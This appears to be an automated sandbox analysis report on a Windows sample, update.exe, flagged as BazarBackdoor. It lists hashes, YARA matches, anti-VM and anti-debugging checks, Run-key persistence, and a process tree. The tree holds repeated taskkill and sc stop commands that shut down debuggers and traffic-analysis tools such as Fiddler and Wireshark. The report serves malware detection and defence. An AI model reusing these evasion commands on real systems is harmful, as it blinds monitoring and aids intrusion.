Analysis
max time kernel: 564s
max time network: 604s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 09-09-2022 14:03
Behavioral task behavioral1: Sample update.exe, Resource win7-20220812-en
Behavioral task behavioral2: Sample update.exe, Resource win10v2004-20220812-en
General
Target: update.exe
Size: 7.6MB
MD5: 38d2e3ad694e5221b828441d82d6172d
SHA1: 02e58b9fccb8fb01339c5f24aa26d656db389bcd
SHA256: 3e8f5d33715f69f5297ca2750d9a9ed491749f009455217626b16f3b268dbcaf
SHA512: e96ca478921cb272f3b246e83b1b7a695638fb001dd05348ef4861b1842a2c49bccc4864867f99439e262fa983202056c196a2508597e2c83f4350683d5e6ea8
SSDEEP: 196608:Bry4z4fbI39lVt1nRMT2cZlpbhQaQ9HQhMWuKej4ifJj/Fv4wkB1S:44z4MD1nS2YlUz9wTuD5/Fv4wcM
Malware Config
Extracted from: C:\Users\Admin\AppData\Local\Temp\5112_419188955\us_tv_and_film.txt
Signatures
BazarBackdoor
Stealthy backdoor targeting corporate networks, believed to be developed by Trickbot's authors.
Bazar/Team9 Backdoor payload 21 IoCs
Processes (resource, yara_rule):
- behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
- behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes: update.exe, K4F80D1AI28Y.exe, J0BK7JPSO0QL.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (update.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (K4F80D1AI28Y.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (J0BK7JPSO0QL.exe)
Nirsoft 21 IoCs
Processes (resource, yara_rule):
- behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
- behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft
Downloads MZ/PE file
Executes dropped EXE 1 IoCs
Processes (pid, process):
- 3000
Stops running service(s) 3 TTPs
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: update.exe, K4F80D1AI28Y.exe, J0BK7JPSO0QL.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (update.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (update.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (K4F80D1AI28Y.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (K4F80D1AI28Y.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (J0BK7JPSO0QL.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (J0BK7JPSO0QL.exe)
Loads dropped DLL 12 IoCs
Processes (pid, process): update.exe, certutil.exe, K4F80D1AI28Y.exe, msedge.exe, certutil.exe, J0BK7JPSO0QL.exe, certutil.exe
- 2864 update.exe
- 4232
- 896 certutil.exe
- 4336 K4F80D1AI28Y.exe
- 3000
- 5112 msedge.exe
- 3884
- 424 certutil.exe
- 1304 J0BK7JPSO0QL.exe
- 3000
- 5112 msedge.exe
- 4252 certutil.exe
Processes (resource, yara_rule):
- behavioral2/memory/2864-132-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-134-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-135-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-283-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-285-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-286-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-315-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-317-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-318-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
- behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida
Adds Run key to start application 2 TTPs 2 IoCs
Processes: msedge.exe, msedge.exe
- Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
- Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
Processes: update.exe, K4F80D1AI28Y.exe, J0BK7JPSO0QL.exe
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (update.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (K4F80D1AI28Y.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (J0BK7JPSO0QL.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes (pid, process):
- 2864 update.exe
- 4336 K4F80D1AI28Y.exe
- 1304 J0BK7JPSO0QL.exe
Drops file in Program Files directory 2 IoCs
Processes: setup.exe
- File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220909160450.pma (setup.exe)
- File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\52d8498b-f826-45e0-936c-269e440ba83c.tmp (setup.exe)
Launches sc.exe 27 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, all sc.exe): 3724, 5020, 1860, 2368, 3044, 4796, 2076, 2380, 5104, 3252, 5860, 2364, 2288, 1072, 5620, 1796, 4492, 4560, 2256, 3664, 4404, 4364, 3812, 4992, 5184, 5212, 3528
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Enumerates system info in registry 2 TTPs 6 IoCs
Processes: msedge.exe, msedge.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Kills process with taskkill 64 IoCs
Processes (pid, all taskkill.exe): 5620, 4460, 1428, 1812, 3576, 3408, 4560, 2444, 4552, 2508, 1196, 4812, 4596, 4224, 3096, 3968, 3624, 832, 4992, 5720, 2316, 560, 5592, 2716, 4584, 3012, 2768, 4604, 5672, 3112, 3568, 4076, 1476, 4380, 2452, 5676, 2076, 3080, 1704, 4612, 5612, 4440, 3624, 3568, 5104, 5032, 2760, 2760, 2452, 1456, 3724, 4460, 3200, 1524, 3308, 1120, 3220, 4196, 3624, 4928, 2792, 8, 4456, 752
Modifies registry class 1 IoCs
Processes: msedge.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)
NTFS ADS 3 IoCs
Processes: msedge.exe, msedge.exe
- File opened for modification C:\Users\Admin\Downloads\Unconfirmed 301679.crdownload:SmartScreen (msedge.exe)
- File opened for modification C:\Users\Admin\Downloads\Unconfirmed 224568.crdownload:SmartScreen (msedge.exe)
- File opened for modification C:\Users\Admin\Downloads\Unconfirmed 817197.crdownload:SmartScreen (msedge.exe)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process): 2864 update.exe (64 occurrences)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
Processes (pid, process): 2104 msedge.exe (5 occurrences), 5112 msedge.exe (9 occurrences)
Suspicious behavior: RenamesItself 3 IoCs
Processes (pid, process):
- 2864 update.exe
- 4336 K4F80D1AI28Y.exe
- 1304 J0BK7JPSO0QL.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (pid, all taskkill.exe, each enabling Token: SeDebugPrivilege): 5032, 1872, 2104, 560, 852, 1276, 2508, 1244, 1820, 4388, 2760, 2768, 2040, 1120, 3568, 2452, 2392, 4460, 4812, 1428, 2076, 32, 4560, 1872, 2908, 3200, 4612, 3624, 4928, 2792, 2760, 800, 1812, 8, 3252, 1524, 2652, 4988, 3576, 3852, 2788, 2444, 3308, 4604, 4552, 3408, 1456, 4568, 4456, 5672, 1612, 3968, 5724, 5512, 3624, 5924, 344, 3112, 1684, 1436, 5720, 5612, 5604, 4660
Suspicious use of FindShellTrayWindow 31 IoCs
Processes (pid, process): 2104 msedge.exe (10 occurrences), 5112 msedge.exe (21 occurrences)
Suspicious use of SetWindowsHookEx 5 IoCs
Processes (pid, process):
- 2864 update.exe
- 4336 K4F80D1AI28Y.exe
- 4336 K4F80D1AI28Y.exe
- 1304 J0BK7JPSO0QL.exe
- 1304 J0BK7JPSO0QL.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid/process wrote to memory of target pid/process; each event was recorded twice):
- PID 2864 update.exe wrote to memory of 1860 cmd.exe
- PID 1860 cmd.exe wrote to memory of 5032 taskkill.exe
- PID 2864 update.exe wrote to memory of 4288 cmd.exe
- PID 4288 cmd.exe wrote to memory of 1872 taskkill.exe
- PID 2864 update.exe wrote to memory of 1116 cmd.exe
- PID 1116 cmd.exe wrote to memory of 4364 sc.exe
- PID 2864 update.exe wrote to memory of 4868 cmd.exe
- PID 4868 cmd.exe wrote to memory of 2104 taskkill.exe
- PID 2864 update.exe wrote to memory of 2440 cmd.exe
- PID 2440 cmd.exe wrote to memory of 560 taskkill.exe
- PID 2864 update.exe wrote to memory of 4540 cmd.exe
- PID 4540 cmd.exe wrote to memory of 852 taskkill.exe
- PID 2864 update.exe wrote to memory of 2328 cmd.exe
- PID 2328 cmd.exe wrote to memory of 1276 taskkill.exe
- PID 2864 update.exe wrote to memory of 2344 cmd.exe
- PID 2344 cmd.exe wrote to memory of 2508 taskkill.exe
- PID 2864 update.exe wrote to memory of 5104 cmd.exe
- PID 5104 cmd.exe wrote to memory of 3664 sc.exe
- PID 2864 update.exe wrote to memory of 3460 cmd.exe
- PID 3460 cmd.exe wrote to memory of 1244 taskkill.exe
- PID 2864 update.exe wrote to memory of 1992 cmd.exe
- PID 1992 cmd.exe wrote to memory of 1820 taskkill.exe
- PID 2864 update.exe wrote to memory of 3164 cmd.exe
- PID 3164 cmd.exe wrote to memory of 4388 taskkill.exe
- PID 2864 update.exe wrote to memory of 1948 cmd.exe
- PID 1948 cmd.exe wrote to memory of 2760 taskkill.exe
- PID 2864 update.exe wrote to memory of 3760 cmd.exe
- PID 3760 cmd.exe wrote to memory of 2768 taskkill.exe
- PID 2864 update.exe wrote to memory of 1676 cmd.exe
- PID 1676 cmd.exe wrote to memory of 2288 sc.exe
- PID 2864 update.exe wrote to memory of 3808 cmd.exe
- PID 3808 cmd.exe wrote to memory of 2040 taskkill.exe
Processes (tree depth shown by indentation; image path | command line, followed by the signatures matched by that process)
- C:\Users\Admin\AppData\Local\Temp\update.exe | "C:\Users\Admin\AppData\Local\Temp\update.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerUI.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /f /im HTTPDebuggerSvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    - C:\Windows\system32\sc.exe | sc stop HTTPDebuggerPro
      - Launches sc.exe
  - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe | cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
    - C:\Windows\system32\taskkill.exe | taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe | cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
-
